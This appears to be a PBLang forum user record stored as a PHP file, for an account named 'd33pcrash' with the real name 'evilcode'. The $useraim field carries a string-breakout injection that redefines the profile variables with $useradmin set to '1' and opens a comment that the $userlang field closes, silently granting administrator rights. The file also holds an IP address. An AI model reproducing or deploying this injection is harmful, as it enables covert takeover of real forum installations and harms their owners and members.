<?php

$userid="261";
$password="6af93fa45cfc39e697ee658d2dc8c25f";
$username="d33pcrash";
$useralias="d33pcrash";
$userrealname="evilcode";
$useremail="evil@hell.com";
$useremhide="hide";
$userip="88.152.118.165";
$usersig="";
$userslogan="PBLang";
$useravatar="none";
$usermsn="evilcode";
$userposts="0";
$usericq="evilcode";
$userqq="evilcode";
$userwebavatar="";
$userrank="1";
$useryahoo="evilcode";
$useraim="evilcode\\\'; $userlocation=\'hell\'; $userjoined=\'1174733561\'; $userhomepage=\'http://\'; $useradmin=\'1\'; $usermod=\'0\'; $userban=\'0\'; $userlastvisit=\'1174733561\'; $userlastpost=\'1174733561\'; $userprevvisit=\'1174733561\'; $useranimsmilies=\'\'; $lastaliaschange=\'1174733549\'; /*";
$userlocation="hell";
$userjoined="1188527849";
$userhomepage="http://";
$useradmin="0";
$usermod="0";
$userban="0";
$userfriend="";
$userlastvisit="1188527849";
$userlastpost="1188527849";
$userprevvisit="1188527849";
$useranimsmilies="";
$lastaliaschange="1188527849";
$userlang="*/ \\$userlang=\\\'en\\\'; //";
$uservisits="";
$aliaslist="";
$noavatars="";

?>